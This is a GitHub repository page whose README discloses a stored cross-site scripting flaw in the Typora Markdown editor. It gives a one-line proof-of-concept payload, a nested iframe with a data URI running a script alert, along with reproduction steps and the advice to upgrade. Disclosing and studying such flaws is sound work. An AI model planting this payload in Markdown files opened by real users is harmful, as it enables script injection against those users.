Skip to content

whoisoo6/Stored-xss-vulnerability-exists-in-Typra

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 
image-2024003623869.png
image-2024003623869.png
 
 
image-20240423732614.png
image-20240423732614.png
 
 
image-2024042910370.png
image-2024042910370.png
 
 

Repository files navigation

Introduction to Typra:

Typora is a Markdown editor and Markdown reader. Lets you write and read documents with seamless real-time preview and distraction-free interface. It supports image, table, code, math, chart, style and other types

Vulnerability description:

Typora v1.0.0-v1.7 version (below) Markdown editor has a cross-site scripting (XSS) vulnerability, which allows attackers to execute arbitrary code by uploading Markdown files.

Download link:

https://typora.io/releases/all

process reproduction:

Enter typra, create a new document, and enter xss payload

<iframe src="data:text/<iframe src="data:text/html;charset=utf-8,<script>alert(1)</script>"></iframe>html,<script>alert(1)</script>"></iframe>

image-20240429103623869

image-20240429103713430

image-20240429103732614

Repair suggestions

Upgrade Typora version

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published